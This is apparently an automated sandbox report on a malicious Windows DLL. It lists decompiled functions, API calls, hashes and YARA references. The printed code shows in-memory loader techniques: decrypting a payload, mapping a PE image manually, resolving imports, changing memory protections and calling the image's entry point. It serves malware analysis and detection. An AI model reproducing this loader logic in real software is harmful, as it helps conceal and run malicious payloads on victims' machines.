					if(_t28 == 0) {
						L8:
						E10001E78(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x10004144 + 0x1000515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x10004144 + 0x1000516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x10004144 + 0x10005184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x10004144 + 0x1000519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E10001DD0(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x100018f0
0x100018f4
0x100019b6
0x100018fa
0x10001912
0x10001921
0x10001928
0x1000192a
0x1000192f
0x100019ae
0x100019af
0x10001931
0x1000193e
0x10001940
0x10001945
0x00000000
0x10001947
0x10001954
0x10001956
0x1000195b
0x00000000
0x1000195d
0x1000196a
0x1000196c
0x10001971
0x00000000
0x10001973
0x10001980
0x10001982
0x10001987
0x00000000
0x10001989
0x1000198f
0x10001994
0x1000199b
0x100019a0
0x100019a5
0x00000000
0x100019a7
0x100019aa
0x100019aa
0x100019a5
0x10001987
0x10001971
0x1000195b
0x10001945
0x1000192f
0x100019c4

APIs

Part of subcall function 10001669: HeapAlloc.KERNEL32(00000000,?,10001C8C,00000208,?,00000000,?,?,?,10001A31,?), ref: 10001675

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,10001EB7,?,?,?,?,00000002,?,?), ref: 10001906
GetProcAddress.KERNEL32(00000000,?), ref: 10001928
GetProcAddress.KERNEL32(00000000,?), ref: 1000193E
GetProcAddress.KERNEL32(00000000,?), ref: 10001954
GetProcAddress.KERNEL32(00000000,?), ref: 1000196A
GetProcAddress.KERNEL32(00000000,?), ref: 10001980

Part of subcall function 10001DD0: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 10001E2D
Part of subcall function 10001DD0: memset.NTDLL ref: 10001E4F

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: 69496cd7a9a7d9bbfd03c7c8bbfa86503ae6f850b609d95769a136b0f31ae68b
Instruction ID: 07b4c9ead737c097f440b77457025fa1314e9054e8ebb6748a7bdb02948612b8
Opcode Fuzzy Hash: 69496cd7a9a7d9bbfd03c7c8bbfa86503ae6f850b609d95769a136b0f31ae68b
Instruction Fuzzy Hash: 51213BB160071AAFE710DF69CD90E9BB7ECEF943C5B024166E944C7219EB70E9048BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000167E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000167E(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x10004130;
				_t39 = E10001F20(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x10004140;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x100051a2; // 0x100051a2
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E10001531(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x10004140 = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x10001685
0x10001695
0x1000169a
0x1000169f
0x100016b4
0x100016bb
0x100016c0
0x100016d1
0x100016d4
0x100016da
0x100016df
0x10001789
0x100016e5
0x100016e5
0x100016e9
0x10001751
0x100016eb
0x100016eb
0x100016ee
0x100016f0
0x100016f8
0x100016fb
0x100016fe
0x10001706
0x1000170e
0x1000170f
0x10001710
0x10001717
0x10001717
0x1000172b
0x10001730
0x10001739
0x10001740
0x10001743
0x10001745
0x1000174c
0x00000000
0x00000000
0x10001703
0x10001703
0x1000174e
0x1000175b
0x10001770
0x1000175d
0x10001766
0x1000176b
0x10001781
0x10001781
0x10001790
0x10001796

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,10001A05,?,00000000,?,?,?,?,?,?,?,10001A05), ref: 100016D4
memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,10001A05,00000000), ref: 10001766
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,10001A05), ref: 10001781

Strings

Dec 20 2020, xrefs: 10001706

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 20 2020
API String ID: 4010158826-3924289079
Opcode ID: 69ab0c6b9a32fe260e2a7950d9aeabe6de4b3ad5f898016cbd094064ed0b85a9
Instruction ID: a679fd416aaa6582b651e1e6bdd6db80fafe1ab0732a7248efed1bbdfeb6c3d2
Opcode Fuzzy Hash: 69ab0c6b9a32fe260e2a7950d9aeabe6de4b3ad5f898016cbd094064ed0b85a9
Instruction Fuzzy Hash: BB318675D0421AEFEB01CF99C881BDEB7B9FF48384F108165E904B7249D771AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 100015BC, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100015BC(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				signed int _t31;
				long _t33;
				int _t34;
				signed int _t35;
				signed int _t42;
				void* _t50;
				void* _t51;
				signed int _t54;

				_v12 = _v12 & 0x00000000;
				_t42 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t42;
				_t31 = VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t42 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t33 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							_t35 = 0;
							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb eax, eax");
						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
					}
					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
					if(_t34 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					_t31 = _v8;
					if(_t31 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x100015c6
0x100015cb
0x100015d7
0x100015e4
0x100015ea
0x100015ec
0x100015f2
0x1000165f
0x10001666
0x10001666
0x100015f4
0x100015f7
0x100015f7
0x100015fb
0x00000000
0x00000000
0x100015fd
0x10001601
0x10001619
0x1000161d
0x10001631
0x1000161f
0x1000161f
0x10001625
0x10001629
0x10001629
0x10001603
0x10001603
0x1000160f
0x10001614
0x10001614
0x10001642
0x10001646
0x1000164e
0x1000164e
0x10001651
0x10001654
0x10001657
0x1000165d
0x00000000
0x00000000
0x00000000
0x00000000
0x1000165d
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 100015EA
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001642
GetLastError.KERNEL32 ref: 10001648

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 83e6e04bcd366fded1c35c8b269c89bea0f76d85a8c834e0f0ae9599731ac213
Instruction ID: 1caff0e5d2961c318858f6bb2b0d7f99fceebbb811b198e9e8c3a8d3f04173f9
Opcode Fuzzy Hash: 83e6e04bcd366fded1c35c8b269c89bea0f76d85a8c834e0f0ae9599731ac213
Instruction Fuzzy Hash: 762190B2900209EFEB20CF94CC95FEDB7F9FB04395F254499E6409B146D3759A85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1000133E, Relevance: 4.6, APIs: 3, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000133E() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				intOrPtr _t30;
				void* _t32;
				signed int _t35;
				intOrPtr* _t37;
				intOrPtr _t39;
				int _t44;

				_t15 =  *0x10004144;
				if( *0x1000412c > 5) {
					_t16 = _t15 + 0x100050f4;
				} else {
					_t16 = _t15 + 0x100050b1;
				}
				E10001B3D(_t16, _t16);
				_t35 = 6;
				memset( &_v32, 0, _t35 << 2);
				if(E1000140B( &_v32,  &_v16,  *0x10004140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x10004138);
					_t8 = _t26 + 2; // 0x2
					_t44 = _t26 + _t8;
					_t11 = _t44 + 8; // 0xa
					_t30 = E10001266(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t37 = _v36;
						 *_t37 = _t30;
						_t32 =  *0x10004138;
						if(_t32 == 0) {
							 *(_t37 + 4) = 0;
						} else {
							memcpy(_t37 + 4, _t32, _t44);
						}
					}
					_t25 = E10001E8D(_v28); // executed
				}
				ExitThread(_t25);
			}

0x10001344
0x10001355
0x1000135f
0x10001357
0x10001357
0x10001357
0x10001366
0x1000136f
0x10001374
0x10001392
0x100013ed
0x10001394
0x1000139a
0x100013a0
0x100013a0
0x100013ae
0x100013b2
0x100013b9
0x100013bb
0x100013bf
0x100013c1
0x100013c8
0x100013dc
0x100013ca
0x100013d0
0x100013d5
0x100013c8
0x100013e4
0x100013e4
0x100013ef

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 1000139A
memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 100013D0
ExitThread.KERNEL32 ref: 100013EF

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: ExitThreadlstrlenmemcpy
String ID:
API String ID: 3726537860-0
Opcode ID: e02dfd363db0967d0870aff3b157c598f88e346b5e58301aa368e4c84523a345
Instruction ID: 3896a0d8cea4ba724126f95b9eff81958b59e96603957c53bc3dc28b2077132e
Opcode Fuzzy Hash: e02dfd363db0967d0870aff3b157c598f88e346b5e58301aa368e4c84523a345
Instruction Fuzzy Hash: BC118B71104305ABF721DBA1CD84ECBB7ECEB443C0F02482AF504D75A9EB20E6448B91

Uniqueness

Uniqueness Score: -1.00%

Function 10001B3D, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10001B3D(void* __eax, intOrPtr _a4) {

				 *0x10004150 =  *0x10004150 & 0x00000000;
				_push(0);
				_push(0x1000414c);
				_push(1);
				_push(_a4);
				 *0x10004148 = 0xc; // executed
				L100010D6(); // executed
				return __eax;
			}

0x10001b3d
0x10001b44
0x10001b46
0x10001b4b
0x10001b4d
0x10001b51
0x10001b5b
0x10001b60

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(1000136B,00000001,1000414C,00000000), ref: 10001B5B

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: daffe624ca004600be1b8070525a12d8ceef1cc4049257a669a48c770c26d2d3
Instruction ID: 3d2b0921c52f1de11b6451a66fa5fceab569c7460954b043f0a25770e4193190
Opcode Fuzzy Hash: daffe624ca004600be1b8070525a12d8ceef1cc4049257a669a48c770c26d2d3
Instruction Fuzzy Hash: B2C04CF8140350A6F620DB809C85FC57A51B7A4785F124504F250252D9CBF510D4851D

Uniqueness

Uniqueness Score: -1.00%

Function 10001E8D, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10001E8D(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E100018E1( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E10001854( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t23 = E100010DC(_t33, _t37); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E100015BC(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E10001E78(_t35);
					L8:
					return _t28;
				}
			}

0x10001e95
0x10001eb2
0x10001eb9
0x10001f18
0x00000000
0x10001ebb
0x10001ebb
0x10001ec5
0x10001ec9
0x10001ece
0x10001ed2
0x10001ed7
0x10001edb
0x10001ee0
0x10001ee5
0x10001ee9
0x10001eee
0x10001eef
0x10001ef3
0x10001ef8
0x10001f00
0x10001f00
0x10001ef8
0x10001ee9
0x10001edb
0x10001f02
0x10001f0b
0x10001f0f
0x10001f19
0x10001f1f
0x10001f1f

APIs

Part of subcall function 100018E1: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,10001EB7,?,?,?,?,00000002,?,?), ref: 10001906
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001928
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 1000193E
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001954
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 1000196A
Part of subcall function 100018E1: GetProcAddress.KERNEL32(00000000,?), ref: 10001980

Part of subcall function 10001854: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,10001EC5,?,?,?,?,?,?,00000002), ref: 1000188B
Part of subcall function 10001854: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 100018C0

Part of subcall function 100010DC: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,?,?,00000002), ref: 10001112
Part of subcall function 100010DC: lstrlenA.KERNEL32(?), ref: 10001128
Part of subcall function 100010DC: memset.NTDLL ref: 10001132
Part of subcall function 100010DC: GetProcAddress.KERNEL32(?,00000002), ref: 10001195
Part of subcall function 100010DC: lstrlenA.KERNEL32(-00000002), ref: 100011AA
Part of subcall function 100010DC: memset.NTDLL ref: 100011B4

Part of subcall function 100015BC: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 100015EA
Part of subcall function 100015BC: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 10001642
Part of subcall function 100015BC: GetLastError.KERNEL32 ref: 10001648

GetLastError.KERNEL32(?,?), ref: 10001EFA

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: 5b4e09b275b9bf9456a116be86b0edfd34f0aa7fdedd34f1755aed87dc6fb2f2
Instruction ID: fe004bb4c71d7bb9e37e360a226a0fa852d7e3fb236af937696d2497153f4d23
Opcode Fuzzy Hash: 5b4e09b275b9bf9456a116be86b0edfd34f0aa7fdedd34f1755aed87dc6fb2f2
Instruction Fuzzy Hash: 47118676600612ABF721D7A98C89DEBB7ECEF48294B010138FA05D7245EBA4FD0587A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10001799, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001799() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x10004130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x1000413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x1000412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x10004128 = _t5;
						 *0x10004130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x10004124 = _t6;
						if(_t6 == 0) {
							 *0x10004124 =  *0x10004124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x1000179a
0x100017a8
0x100017ae
0x100017b5
0x1000180c
0x1000180c
0x100017b7
0x100017bf
0x100017cc
0x100017cc
0x10001808
0x1000180a
0x00000000
0x00000000
0x00000000
0x100017c1
0x100017c8
0x100017ce
0x100017ce
0x100017d3
0x100017e1
0x100017e6
0x100017ec
0x100017f2
0x100017f9
0x100017fb
0x100017fb
0x10001805
0x100017ca
0x100017ca
0x00000000
0x100017ca
0x100017c8

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,100019D3), ref: 100017A8
GetVersion.KERNEL32(?,100019D3), ref: 100017B7
GetCurrentProcessId.KERNEL32(?,100019D3), ref: 100017D3
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,100019D3), ref: 100017EC

Memory Dump Source

Source File: 00000000.00000002.1018937360.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1018947341.0000000010005000.00000040.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: be86b185e164205b92613c215166423dbb3ce5b8bef7792cf5731e59b1f85228
Instruction ID: 476726ea2d1ce052e5984cf8ea575588ff25578c4e3a38b3fd47c6afe3a87b53
Opcode Fuzzy Hash: be86b185e164205b92613c215166423dbb3ce5b8bef7792cf5731e59b1f85228
Instruction Fuzzy Hash: 81F0AFB06453319BF7429F68AD9A7C53BE4E7097D3F128119E641C61ECEBB089918B4C

Uniqueness

Uniqueness Score: -1.00%

Function 100022E5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100022E5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x100022ef
0x100022f2
0x100022f8
0x10002316
0x00000000
0x10002316
0x10002300
0x10002309
0x1000230f
0x1000231e
0x10002321
0x10002324
0x1000232e
0x1000232e
0x10002330
0x10002333
0x10002335
0x10002335
0x10002337
0x1000233a
0x00000000
0x00000000
0x1000233c
0x1000233e
0x100023a4
0x100023a4
0x10002502
0x00000000
0x10002502
0x10002340
0x10002340
0x10002344
0x10002346
0x10002346
0x10002346
0x10002346
0x10002349
0x1000234a
0x1000234d
0x1000234d
0x10002351
0x10002355
0x10002363
0x10002363
0x1000236b
0x10002371
0x10002373
0x10002375
0x10002385
0x10002392
0x10002396
0x1000239b
0x1000239d
0x1000241b
0x1000241b
0x1000239f
0x1000239f
0x1000239f
0x1000241d
0x1000241f
0x10002500
0x10002500
0x00000000
0x10002425
0x10002425
0x1000242c
0x00000000
0x00000000
0x10002432
0x10002436
0x10002492
0x10002494
0x1000249c
0x1000249e
0x100024a0
0x00000000
0x00000000
0x100024a2
0x100024a8
0x100024aa
0x100024ac
0x100024c1
0x100024c1
0x100024c3
0x100024f2
0x100024f9
0x00000000
0x100024f9
0x100024c7
0x100024c8
0x100024ca
0x100024cc
0x100024cc
0x100024ce
0x100024d0
0x100024d2
0x100024e6
0x100024e6
0x100024e9
0x100024eb
0x100024eb
0x100024ec
0x100024ec
